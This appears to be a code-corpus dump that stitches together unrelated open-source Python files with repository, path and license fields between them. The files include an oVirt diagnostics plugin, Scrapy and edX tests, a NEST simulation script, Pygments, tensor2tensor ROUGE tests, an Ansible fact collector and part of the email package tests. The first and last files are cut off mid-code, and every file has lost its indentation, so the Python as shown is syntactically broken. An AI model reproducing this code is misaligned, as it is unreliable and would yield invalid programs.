# nav to requests page to check quota validation
request_description = ("Provisioning Service [{catalog_item_name}] from [{catalog_item_name}]"
.format(catalog_item_name=catalog_item.name))
provision_request = appliance.collections.requests.instantiate(request_description)
provision_request.wait_for_request(method='ui')
request.addfinalizer(provision_request.remove_request)
assert provision_request.row.reason.text == "Quota Exceeded"
|
gpl-2.0
|
haiyangd/python-porject
|
src/ovirt/node/setup/core/diagnostics_page.py
|
2
|
3004
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# diagnostics_page.py - Copyright (C) 2012-2014 Red Hat, Inc.
# Written by Fabian Deutsch <fabiand@redhat.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA. A copy of the GNU General Public License is
# also available at http://www.gnu.org/copyleft/gpl.html.
from ovirt.node import plugins, ui
from ovirt.node.utils import process
"""
Diagnostics page
"""
class Plugin(plugins.NodePlugin):
def name(self):
return _("Diagnostics")
def rank(self):
return 95
def model(self):
"""Don't need to set up anything"""
return {}
def validators(self):
"""Validators validate the input on change and give UI feedback
"""
return {}
def ui_content(self):
"""Describes the UI this plugin requires
This is an ordered list of (path, widget) tuples.
"""
ws = [ui.Header("diagnostic._header", _("Diagnostic Utilities")),
ui.Label("diagnostic.info", _("Select one of the tools below.")),
ui.Divider("diagnostic.divider"),
ui.Table("diagnostic.tools", "", _("Available diagnostics"),
self.__diagnostics(), height=min(
len(self.__diagnostics()), 4)),
]
page = ui.Page("page", ws)
page.buttons = []
self.widgets.add(page)
return page
def on_change(self, changes):
pass
def on_merge(self, changes):
if changes.contains_any(["diagnostic.logfiles", "diagnostic.tools"]):
cmds = {}
changed_field = changes.keys()[0]
if "diagnostic.tools" in changed_field:
cmds = dict((name, cmd) for (name, cmd)
in self.__diagnostics())
cmd = cmds.get(changes[changed_field], None)
if cmd:
contents = process.check_output(cmd,
stderr=process.STDOUT,
shell=True)
return ui.TextViewDialog("output.dialog", _("Command Output"),
contents)
def __diagnostics(self):
return [("multipath", "multipath -ll"),
("fdisk", "fdisk -l"),
("parted", "parted -s -l"),
("lsblk", "lsblk")]
|
gpl-2.0
|
fontenele/scrapy
|
tests/test_commands.py
|
105
|
8613
|
import os
import sys
import subprocess
import tempfile
from time import sleep
from os.path import exists, join, abspath
from shutil import rmtree
from tempfile import mkdtemp
from twisted.trial import unittest
from twisted.internet import defer
from scrapy.utils.python import retry_on_eintr
from scrapy.utils.test import get_testenv
from scrapy.utils.testsite import SiteTest
from scrapy.utils.testproc import ProcessTest
class ProjectTest(unittest.TestCase):
project_name = 'testproject'
def setUp(self):
self.temp_path = mkdtemp()
self.cwd = self.temp_path
self.proj_path = join(self.temp_path, self.project_name)
self.proj_mod_path = join(self.proj_path, self.project_name)
self.env = get_testenv()
def tearDown(self):
rmtree(self.temp_path)
def call(self, *new_args, **kwargs):
with tempfile.TemporaryFile() as out:
args = (sys.executable, '-m', 'scrapy.cmdline') + new_args
return subprocess.call(args, stdout=out, stderr=out, cwd=self.cwd,
env=self.env, **kwargs)
def proc(self, *new_args, **kwargs):
args = (sys.executable, '-m', 'scrapy.cmdline') + new_args
p = subprocess.Popen(args, cwd=self.cwd, env=self.env,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
**kwargs)
waited = 0
interval = 0.2
while p.poll() is None:
sleep(interval)
waited += interval
if waited > 15:
p.kill()
assert False, 'Command took too much time to complete'
return p
class StartprojectTest(ProjectTest):
def test_startproject(self):
self.assertEqual(0, self.call('startproject', self.project_name))
assert exists(join(self.proj_path, 'scrapy.cfg'))
assert exists(join(self.proj_path, 'testproject'))
assert exists(join(self.proj_mod_path, '__init__.py'))
assert exists(join(self.proj_mod_path, 'items.py'))
assert exists(join(self.proj_mod_path, 'pipelines.py'))
assert exists(join(self.proj_mod_path, 'settings.py'))
assert exists(join(self.proj_mod_path, 'spiders', '__init__.py'))
self.assertEqual(1, self.call('startproject', self.project_name))
self.assertEqual(1, self.call('startproject', 'wrong---project---name'))
self.assertEqual(1, self.call('startproject', 'sys'))
class CommandTest(ProjectTest):
def setUp(self):
super(CommandTest, self).setUp()
self.call('startproject', self.project_name)
self.cwd = join(self.temp_path, self.project_name)
self.env['SCRAPY_SETTINGS_MODULE'] = '%s.settings' % self.project_name
class GenspiderCommandTest(CommandTest):
def test_arguments(self):
# only pass one argument. spider script shouldn't be created
self.assertEqual(2, self.call('genspider', 'test_name'))
assert not exists(join(self.proj_mod_path, 'spiders', 'test_name.py'))
# pass two arguments <name> <domain>. spider script should be created
self.assertEqual(0, self.call('genspider', 'test_name', 'test.com'))
assert exists(join(self.proj_mod_path, 'spiders', 'test_name.py'))
def test_template(self, tplname='crawl'):
args = ['--template=%s' % tplname] if tplname else []
spname = 'test_spider'
p = self.proc('genspider', spname, 'test.com', *args)
out = retry_on_eintr(p.stdout.read)
self.assertIn("Created spider %r using template %r in module" % (spname, tplname), out)
self.assertTrue(exists(join(self.proj_mod_path, 'spiders', 'test_spider.py')))
p = self.proc('genspider', spname, 'test.com', *args)
out = retry_on_eintr(p.stdout.read)
self.assertIn("Spider %r already exists in module" % spname, out)
def test_template_basic(self):
self.test_template('basic')
def test_template_csvfeed(self):
self.test_template('csvfeed')
def test_template_xmlfeed(self):
self.test_template('xmlfeed')
def test_list(self):
self.assertEqual(0, self.call('genspider', '--list'))
def test_dump(self):
self.assertEqual(0, self.call('genspider', '--dump=basic'))
self.assertEqual(0, self.call('genspider', '-d', 'basic'))
def test_same_name_as_project(self):
self.assertEqual(2, self.call('genspider', self.project_name))
assert not exists(join(self.proj_mod_path, 'spiders', '%s.py' % self.project_name))
class MiscCommandsTest(CommandTest):
def test_list(self):
self.assertEqual(0, self.call('list'))
class RunSpiderCommandTest(CommandTest):
def test_runspider(self):
tmpdir = self.mktemp()
os.mkdir(tmpdir)
fname = abspath(join(tmpdir, 'myspider.py'))
with open(fname, 'w') as f:
f.write("""
import scrapy
class MySpider(scrapy.Spider):
name = 'myspider'
def start_requests(self):
self.logger.debug("It Works!")
return []
""")
p = self.proc('runspider', fname)
log = p.stderr.read()
self.assertIn("DEBUG: It Works!", log)
self.assertIn("INFO: Spider opened", log)
self.assertIn("INFO: Closing spider (finished)", log)
self.assertIn("INFO: Spider closed (finished)", log)
def test_runspider_no_spider_found(self):
tmpdir = self.mktemp()
os.mkdir(tmpdir)
fname = abspath(join(tmpdir, 'myspider.py'))
with open(fname, 'w') as f:
f.write("""
from scrapy.spiders import Spider
""")
p = self.proc('runspider', fname)
log = p.stderr.read()
self.assertIn("No spider found in file", log)
def test_runspider_file_not_found(self):
p = self.proc('runspider', 'some_non_existent_file')
log = p.stderr.read()
self.assertIn("File not found: some_non_existent_file", log)
def test_runspider_unable_to_load(self):
tmpdir = self.mktemp()
os.mkdir(tmpdir)
fname = abspath(join(tmpdir, 'myspider.txt'))
with open(fname, 'w') as f:
f.write("")
p = self.proc('runspider', fname)
log = p.stderr.read()
self.assertIn("Unable to load", log)
class ParseCommandTest(ProcessTest, SiteTest, CommandTest):
command = 'parse'
def setUp(self):
super(ParseCommandTest, self).setUp()
self.spider_name = 'parse_spider'
fname = abspath(join(self.proj_mod_path, 'spiders', 'myspider.py'))
with open(fname, 'w') as f:
f.write("""
import scrapy
class MySpider(scrapy.Spider):
name = '{0}'
def parse(self, response):
if getattr(self, 'test_arg', None):
self.logger.debug('It Works!')
return [scrapy.Item(), dict(foo='bar')]
""".format(self.spider_name))
fname = abspath(join(self.proj_mod_path, 'pipelines.py'))
with open(fname, 'w') as f:
f.write("""
import logging
class MyPipeline(object):
component_name = 'my_pipeline'
def process_item(self, item, spider):
logging.info('It Works!')
return item
""")
fname = abspath(join(self.proj_mod_path, 'settings.py'))
with open(fname, 'a') as f:
f.write("""
ITEM_PIPELINES = {'%s.pipelines.MyPipeline': 1}
""" % self.project_name)
@defer.inlineCallbacks
def test_spider_arguments(self):
_, _, stderr = yield self.execute(['--spider', self.spider_name,
'-a', 'test_arg=1',
'-c', 'parse',
self.url('/html')])
self.assertIn("DEBUG: It Works!", stderr)
@defer.inlineCallbacks
def test_pipelines(self):
_, _, stderr = yield self.execute(['--spider', self.spider_name,
'--pipelines',
'-c', 'parse',
self.url('/html')])
self.assertIn("INFO: It Works!", stderr)
@defer.inlineCallbacks
def test_parse_items(self):
status, out, stderr = yield self.execute(
['--spider', self.spider_name, '-c', 'parse', self.url('/html')]
)
self.assertIn("""[{}, {'foo': 'bar'}]""", out)
class BenchCommandTest(CommandTest):
def test_run(self):
p = self.proc('bench', '-s', 'LOGSTATS_INTERVAL=0.001',
'-s', 'CLOSESPIDER_TIMEOUT=0.01')
log = p.stderr.read()
self.assertIn('INFO: Crawled', log)
|
bsd-3-clause
|
UXE/local-edx
|
cms/djangoapps/contentstore/tests/test_orphan.py
|
32
|
4165
|
"""
Test finding orphans via the view and django config
"""
import json
from contentstore.tests.utils import CourseTestCase
from student.models import CourseEnrollment
from xmodule.modulestore.django import modulestore
from contentstore.utils import reverse_course_url
class TestOrphan(CourseTestCase):
"""
Test finding orphans via view and django config
"""
def setUp(self):
super(TestOrphan, self).setUp()
runtime = self.course.runtime
self._create_item('chapter', 'Chapter1', {}, {'display_name': 'Chapter 1'}, 'course', self.course.location.name, runtime)
self._create_item('chapter', 'Chapter2', {}, {'display_name': 'Chapter 2'}, 'course', self.course.location.name, runtime)
self._create_item('chapter', 'OrphanChapter', {}, {'display_name': 'Orphan Chapter'}, None, None, runtime)
self._create_item('vertical', 'Vert1', {}, {'display_name': 'Vertical 1'}, 'chapter', 'Chapter1', runtime)
self._create_item('vertical', 'OrphanVert', {}, {'display_name': 'Orphan Vertical'}, None, None, runtime)
self._create_item('html', 'Html1', "<p>Goodbye</p>", {'display_name': 'Parented Html'}, 'vertical', 'Vert1', runtime)
self._create_item('html', 'OrphanHtml', "<p>Hello</p>", {'display_name': 'Orphan html'}, None, None, runtime)
self._create_item('static_tab', 'staticuno', "<p>tab</p>", {'display_name': 'Tab uno'}, None, None, runtime)
self._create_item('about', 'overview', "<p>overview</p>", {}, None, None, runtime)
self._create_item('course_info', 'updates', "<ol><li><h2>Sep 22</h2><p>test</p></li></ol>", {}, None, None, runtime)
self.orphan_url = reverse_course_url('orphan_handler', self.course.id)
def _create_item(self, category, name, data, metadata, parent_category, parent_name, runtime):
location = self.course.location.replace(category=category, name=name)
store = modulestore()
store.create_item(
self.user.id,
location.course_key,
location.block_type,
location.block_id,
definition_data=data,
metadata=metadata,
runtime=runtime
)
if parent_name:
# add child to parent in mongo
parent_location = self.course.location.replace(category=parent_category, name=parent_name)
parent = store.get_item(parent_location)
parent.children.append(location)
store.update_item(parent, self.user.id)
def test_mongo_orphan(self):
"""
Test that old mongo finds the orphans
"""
orphans = json.loads(
self.client.get(
self.orphan_url,
HTTP_ACCEPT='application/json'
).content
)
self.assertEqual(len(orphans), 3, "Wrong # {}".format(orphans))
location = self.course.location.replace(category='chapter', name='OrphanChapter')
self.assertIn(location.to_deprecated_string(), orphans)
location = self.course.location.replace(category='vertical', name='OrphanVert')
self.assertIn(location.to_deprecated_string(), orphans)
location = self.course.location.replace(category='html', name='OrphanHtml')
self.assertIn(location.to_deprecated_string(), orphans)
def test_mongo_orphan_delete(self):
"""
Test that old mongo deletes the orphans
"""
self.client.delete(self.orphan_url)
orphans = json.loads(
self.client.get(self.orphan_url, HTTP_ACCEPT='application/json').content
)
self.assertEqual(len(orphans), 0, "Orphans not deleted {}".format(orphans))
def test_not_permitted(self):
"""
Test that auth restricts get and delete appropriately
"""
test_user_client, test_user = self.create_non_staff_authed_user_client()
CourseEnrollment.enroll(test_user, self.course.id)
response = test_user_client.get(self.orphan_url)
self.assertEqual(response.status_code, 403)
response = test_user_client.delete(self.orphan_url)
self.assertEqual(response.status_code, 403)
|
agpl-3.0
|
jakobj/nest-simulator
|
pynest/examples/Potjans_2014/run_microcircuit.py
|
14
|
3878
|
# -*- coding: utf-8 -*-
#
# run_microcircuit.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""PyNEST Microcircuit: Run Simulation
-----------------------------------------
This is an example script for running the microcircuit model and generating
basic plots of the network activity.
"""
###############################################################################
# Import the necessary modules and start the time measurements.
from stimulus_params import stim_dict
from network_params import net_dict
from sim_params import sim_dict
import network
import nest
import numpy as np
import time
time_start = time.time()
###############################################################################
# Initialize the network with simulation, network and stimulation parameters,
# then create and connect all nodes, and finally simulate.
# The times for a presimulation and the main simulation are taken
# independently. A presimulation is useful because the spike activity typically
# exhibits a startup transient. In benchmark simulations, this transient should
# be excluded from a time measurement of the state propagation phase. Besides,
# statistical measures of the spike activity should only be computed after the
# transient has passed.
net = network.Network(sim_dict, net_dict, stim_dict)
time_network = time.time()
net.create()
time_create = time.time()
net.connect()
time_connect = time.time()
net.simulate(sim_dict['t_presim'])
time_presimulate = time.time()
net.simulate(sim_dict['t_sim'])
time_simulate = time.time()
###############################################################################
# Plot a spike raster of the simulated neurons and a box plot of the firing
# rates for each population.
# For visual purposes only, spikes 100 ms before and 100 ms after the thalamic
# stimulus time are plotted here by default.
# The computation of spike rates discards the presimulation time to exclude
# initialization artifacts.
raster_plot_interval = np.array([stim_dict['th_start'] - 100.0,
stim_dict['th_start'] + 100.0])
firing_rates_interval = np.array([sim_dict['t_presim'],
sim_dict['t_presim'] + sim_dict['t_sim']])
net.evaluate(raster_plot_interval, firing_rates_interval)
time_evaluate = time.time()
###############################################################################
# Summarize time measurements. Rank 0 usually takes longest because of the
# data evaluation and print calls.
print(
'\nTimes of Rank {}:\n'.format(
nest.Rank()) +
' Total time: {:.3f} s\n'.format(
time_evaluate -
time_start) +
' Time to initialize: {:.3f} s\n'.format(
time_network -
time_start) +
' Time to create: {:.3f} s\n'.format(
time_create -
time_network) +
' Time to connect: {:.3f} s\n'.format(
time_connect -
time_create) +
' Time to presimulate: {:.3f} s\n'.format(
time_presimulate -
time_connect) +
' Time to simulate: {:.3f} s\n'.format(
time_simulate -
time_presimulate) +
' Time to evaluate: {:.3f} s\n'.format(
time_evaluate -
time_simulate))
|
gpl-2.0
|
RenderBroken/msm8974_Victara-Stock_render_kernel
|
tools/perf/scripts/python/futex-contention.py
|
11261
|
1486
|
# futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
process_names = {}
thread_thislock = {}
thread_blocktime = {}
lock_waits = {} # long-lived stats on (tid,lock) blockage elapsed time
process_names = {} # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, uaddr, op, val, utime, uaddr2, val3):
cmd = op & FUTEX_CMD_MASK
if cmd != FUTEX_WAIT:
return # we don't care about originators of WAKE events
process_names[tid] = comm
thread_thislock[tid] = uaddr
thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, ret):
if thread_blocktime.has_key(tid):
elapsed = nsecs(s, ns) - thread_blocktime[tid]
add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
del thread_blocktime[tid]
del thread_thislock[tid]
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
for (tid, lock) in lock_waits:
min, max, avg, count = lock_waits[tid, lock]
print "%s[%d] lock %x contended %d times, %d avg ns" % \
(process_names[tid], tid, lock, count, avg)
|
gpl-2.0
|
ipcamit/ipcamit.github.io
|
node_modules/pygmentize-bundled/vendor/pygments/pygments/scanner.py
|
365
|
3114
|
# -*- coding: utf-8 -*-
"""
pygments.scanner
~~~~~~~~~~~~~~~~
This library implements a regex based scanner. Some languages
like Pascal are easy to parse but have some keywords that
depend on the context. Because of this it's impossible to lex
that just by using a regular expression lexer like the
`RegexLexer`.
Have a look at the `DelphiLexer` to get an idea of how to use
this scanner.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
class EndOfText(RuntimeError):
"""
Raise if end of text is reached and the user
tried to call a match function.
"""
class Scanner(object):
"""
Simple scanner
All method patterns are regular expression strings (not
compiled expressions!)
"""
def __init__(self, text, flags=0):
"""
:param text: The text which should be scanned
:param flags: default regular expression flags
"""
self.data = text
self.data_length = len(text)
self.start_pos = 0
self.pos = 0
self.flags = flags
self.last = None
self.match = None
self._re_cache = {}
def eos(self):
"""`True` if the scanner reached the end of text."""
return self.pos >= self.data_length
eos = property(eos, eos.__doc__)
def check(self, pattern):
"""
Apply `pattern` on the current position and return
the match object. (Doesn't touch pos). Use this for
lookahead.
"""
if self.eos:
raise EndOfText()
if pattern not in self._re_cache:
self._re_cache[pattern] = re.compile(pattern, self.flags)
return self._re_cache[pattern].match(self.data, self.pos)
def test(self, pattern):
"""Apply a pattern on the current position and check
if it patches. Doesn't touch pos."""
return self.check(pattern) is not None
def scan(self, pattern):
"""
Scan the text for the given pattern and update pos/match
and related fields. The return value is a boolen that
indicates if the pattern matched. The matched value is
stored on the instance as ``match``, the last value is
stored as ``last``. ``start_pos`` is the position of the
pointer before the pattern was matched, ``pos`` is the
end position.
"""
if self.eos:
raise EndOfText()
if pattern not in self._re_cache:
self._re_cache[pattern] = re.compile(pattern, self.flags)
self.last = self.match
m = self._re_cache[pattern].match(self.data, self.pos)
if m is None:
return False
self.start_pos = m.start()
self.pos = m.end()
self.match = m.group()
return True
def get_char(self):
"""Scan exactly one char."""
self.scan('.')
def __repr__(self):
return '<%s %d/%d>' % (
self.__class__.__name__,
self.pos,
self.data_length
)
|
mit
|
tensorflow/tensor2tensor
|
tensor2tensor/utils/rouge_test.py
|
1
|
4407
|
# coding=utf-8
# Copyright 2021 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Rouge metric."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensor2tensor.utils import rouge
import tensorflow.compat.v1 as tf
class TestRouge2Metric(tf.test.TestCase):
"""Tests the rouge-2 metric."""
def testRouge2Identical(self):
hypotheses = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
references = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
self.assertAllClose(rouge.rouge_n(hypotheses, references), 1.0, atol=1e-03)
def testRouge2Disjoint(self):
hypotheses = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
references = np.array([[8, 9, 10, 11, 12, 13, 14, 15, 16, 17],
[9, 10, 11, 12, 13, 14, 15, 16, 17, 0]])
self.assertEqual(rouge.rouge_n(hypotheses, references), 0.0)
def testRouge2PartialOverlap(self):
hypotheses = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
references = np.array([[1, 9, 2, 3, 4, 5, 1, 10, 6, 7],
[1, 9, 2, 3, 4, 5, 1, 10, 6, 7]])
self.assertAllClose(rouge.rouge_n(hypotheses, references), 0.53, atol=1e-03)
class TestRougeLMetric(tf.test.TestCase):
"""Tests the rouge-l metric."""
def testRougeLIdentical(self):
hypotheses = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
references = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
self.assertAllClose(
rouge.rouge_l_sentence_level(hypotheses, references), 1.0, atol=1e-03)
def testRougeLDisjoint(self):
hypotheses = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
references = np.array([[8, 9, 10, 11, 12, 13, 14, 15, 16, 17],
[9, 10, 11, 12, 13, 14, 15, 16, 17, 0]])
self.assertEqual(rouge.rouge_l_sentence_level(hypotheses, references), 0.0)
def testRougeLPartialOverlap(self):
hypotheses = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
references = np.array([[1, 9, 2, 3, 4, 5, 1, 10, 6, 7],
[1, 9, 2, 3, 4, 5, 1, 10, 6, 7]])
self.assertAllClose(
rouge.rouge_l_sentence_level(hypotheses, references), 0.837, atol=1e-03)
class TestRougeMetricsE2E(tf.test.TestCase):
"""Tests the rouge metrics end-to-end."""
def testRouge2MetricE2E(self):
vocab_size = 4
batch_size = 12
seq_length = 12
predictions = tf.one_hot(
np.random.randint(vocab_size, size=(batch_size, seq_length, 1, 1)),
depth=4,
dtype=tf.float32)
targets = np.random.randint(4, size=(12, 12, 1, 1))
with self.test_session() as session:
scores, _ = rouge.rouge_2_fscore(predictions,
tf.constant(targets, dtype=tf.int32))
a = tf.reduce_mean(scores)
session.run(tf.global_variables_initializer())
session.run(a)
def testRougeLMetricE2E(self):
vocab_size = 4
batch_size = 12
seq_length = 12
predictions = tf.one_hot(
np.random.randint(vocab_size, size=(batch_size, seq_length, 1, 1)),
depth=4,
dtype=tf.float32)
targets = np.random.randint(4, size=(12, 12, 1, 1))
with self.test_session() as session:
scores, _ = rouge.rouge_l_fscore(
predictions,
tf.constant(targets, dtype=tf.int32))
a = tf.reduce_mean(scores)
session.run(tf.global_variables_initializer())
session.run(a)
if __name__ == "__main__":
tf.test.main()
|
apache-2.0
|
kvar/ansible
|
lib/ansible/module_utils/facts/system/fips.py
|
232
|
1338
|
# Determine if a system is in 'fips' mode
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.facts.utils import get_file_content
from ansible.module_utils.facts.collector import BaseFactCollector
class FipsFactCollector(BaseFactCollector):
name = 'fips'
_fact_ids = set()
def collect(self, module=None, collected_facts=None):
# NOTE: this is populated even if it is not set
fips_facts = {}
fips_facts['fips'] = False
data = get_file_content('/proc/sys/crypto/fips_enabled')
if data and data == '1':
fips_facts['fips'] = True
return fips_facts
|
gpl-3.0
|
pwoodworth/intellij-community
|
python/lib/Lib/email/test/test_email_renamed.py
|
134
|
118811
|
# Copyright (C) 2001-2007 Python Software Foundation
# Contact: email-sig@python.org
# email package unit tests
import os
import sys
import time
import base64
import difflib
import unittest
import warnings
from cStringIO import StringIO
import email
from email.charset import Charset
from email.header import Header, decode_header, make_header
from email.parser import Parser, HeaderParser
from email.generator import Generator, DecodedGenerator
from email.message import Message
from email.mime.application import MIMEApplication
from email.mime.audio import MIMEAudio
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.base import MIMEBase
from email.mime.message import MIMEMessage
from email.mime.multipart import MIMEMultipart
from email import utils
from email import errors
from email import encoders
from email import iterators
from email import base64mime
from email import quoprimime
from test.test_support import findfile, run_unittest
from email.test import __file__ as landmark
NL = '\n'
EMPTYSTRING = ''
SPACE = ' '
def openfile(filename, mode='r'):
path = os.path.join(os.path.dirname(landmark), 'data', filename)
return open(path, mode)
# Base test class
class TestEmailBase(unittest.TestCase):
def ndiffAssertEqual(self, first, second):
"""Like failUnlessEqual except use ndiff for readable output."""
if first <> second:
sfirst = str(first)
ssecond = str(second)
diff = difflib.ndiff(sfirst.splitlines(), ssecond.splitlines())
fp = StringIO()
print >> fp, NL, NL.join(diff)
raise self.failureException, fp.getvalue()
def _msgobj(self, filename):
fp = openfile(findfile(filename))
try:
msg = email.message_from_file(fp)
finally:
fp.close()
return msg
# Test various aspects of the Message class's API
class TestMessageAPI(TestEmailBase):
def test_get_all(self):
eq = self.assertEqual
msg = self._msgobj('msg_20.txt')
eq(msg.get_all('cc'), ['ccc@zzz.org', 'ddd@zzz.org', 'eee@zzz.org'])
eq(msg.get_all('xx', 'n/a'), 'n/a')
def test_getset_charset(self):
eq = self.assertEqual
msg = Message()
eq(msg.get_charset(), None)
charset = Charset('iso-8859-1')
msg.set_charset(charset)
eq(msg['mime-version'], '1.0')
eq(msg.get_content_type(), 'text/plain')
eq(msg['content-type'], 'text/plain; charset="iso-8859-1"')
eq(msg.get_param('charset'), 'iso-8859-1')
eq(msg['content-transfer-encoding'], 'quoted-printable')
eq(msg.get_charset().input_charset, 'iso-8859-1')
# Remove the charset
msg.set_charset(None)
eq(msg.get_charset(), None)
eq(msg['content-type'], 'text/plain')
# Try adding a charset when there's already MIME headers present
msg = Message()
msg['MIME-Version'] = '2.0'
msg['Content-Type'] = 'text/x-weird'
msg['Content-Transfer-Encoding'] = 'quinted-puntable'
msg.set_charset(charset)
eq(msg['mime-version'], '2.0')
eq(msg['content-type'], 'text/x-weird; charset="iso-8859-1"')
eq(msg['content-transfer-encoding'], 'quinted-puntable')
def test_set_charset_from_string(self):
eq = self.assertEqual
msg = Message()
msg.set_charset('us-ascii')
eq(msg.get_charset().input_charset, 'us-ascii')
eq(msg['content-type'], 'text/plain; charset="us-ascii"')
def test_set_payload_with_charset(self):
msg = Message()
charset = Charset('iso-8859-1')
msg.set_payload('This is a string payload', charset)
self.assertEqual(msg.get_charset().input_charset, 'iso-8859-1')
def test_get_charsets(self):
eq = self.assertEqual
msg = self._msgobj('msg_08.txt')
charsets = msg.get_charsets()
eq(charsets, [None, 'us-ascii', 'iso-8859-1', 'iso-8859-2', 'koi8-r'])
msg = self._msgobj('msg_09.txt')
charsets = msg.get_charsets('dingbat')
eq(charsets, ['dingbat', 'us-ascii', 'iso-8859-1', 'dingbat',
'koi8-r'])
msg = self._msgobj('msg_12.txt')
charsets = msg.get_charsets()
eq(charsets, [None, 'us-ascii', 'iso-8859-1', None, 'iso-8859-2',
'iso-8859-3', 'us-ascii', 'koi8-r'])
def test_get_filename(self):
eq = self.assertEqual
msg = self._msgobj('msg_04.txt')
filenames = [p.get_filename() for p in msg.get_payload()]
eq(filenames, ['msg.txt', 'msg.txt'])
msg = self._msgobj('msg_07.txt')
subpart = msg.get_payload(1)
eq(subpart.get_filename(), 'dingusfish.gif')
def test_get_filename_with_name_parameter(self):
eq = self.assertEqual
msg = self._msgobj('msg_44.txt')
filenames = [p.get_filename() for p in msg.get_payload()]
eq(filenames, ['msg.txt', 'msg.txt'])
def test_get_boundary(self):
eq = self.assertEqual
msg = self._msgobj('msg_07.txt')
# No quotes!
eq(msg.get_boundary(), 'BOUNDARY')
def test_set_boundary(self):
eq = self.assertEqual
# This one has no existing boundary parameter, but the Content-Type:
# header appears fifth.
msg = self._msgobj('msg_01.txt')
msg.set_boundary('BOUNDARY')
header, value = msg.items()[4]
eq(header.lower(), 'content-type')
eq(value, 'text/plain; charset="us-ascii"; boundary="BOUNDARY"')
# This one has a Content-Type: header, with a boundary, stuck in the
# middle of its headers. Make sure the order is preserved; it should
# be fifth.
msg = self._msgobj('msg_04.txt')
msg.set_boundary('BOUNDARY')
header, value = msg.items()[4]
eq(header.lower(), 'content-type')
eq(value, 'multipart/mixed; boundary="BOUNDARY"')
# And this one has no Content-Type: header at all.
msg = self._msgobj('msg_03.txt')
self.assertRaises(errors.HeaderParseError,
msg.set_boundary, 'BOUNDARY')
def test_get_decoded_payload(self):
eq = self.assertEqual
msg = self._msgobj('msg_10.txt')
# The outer message is a multipart
eq(msg.get_payload(decode=True), None)
# Subpart 1 is 7bit encoded
eq(msg.get_payload(0).get_payload(decode=True),
'This is a 7bit encoded message.\n')
# Subpart 2 is quopri
eq(msg.get_payload(1).get_payload(decode=True),
'\xa1This is a Quoted Printable encoded message!\n')
# Subpart 3 is base64
eq(msg.get_payload(2).get_payload(decode=True),
'This is a Base64 encoded message.')
# Subpart 4 has no Content-Transfer-Encoding: header.
eq(msg.get_payload(3).get_payload(decode=True),
'This has no Content-Transfer-Encoding: header.\n')
def test_get_decoded_uu_payload(self):
eq = self.assertEqual
msg = Message()
msg.set_payload('begin 666 -\n+:&5L;&\\@=V]R;&0 \n \nend\n')
for cte in ('x-uuencode', 'uuencode', 'uue', 'x-uue'):
msg['content-transfer-encoding'] = cte
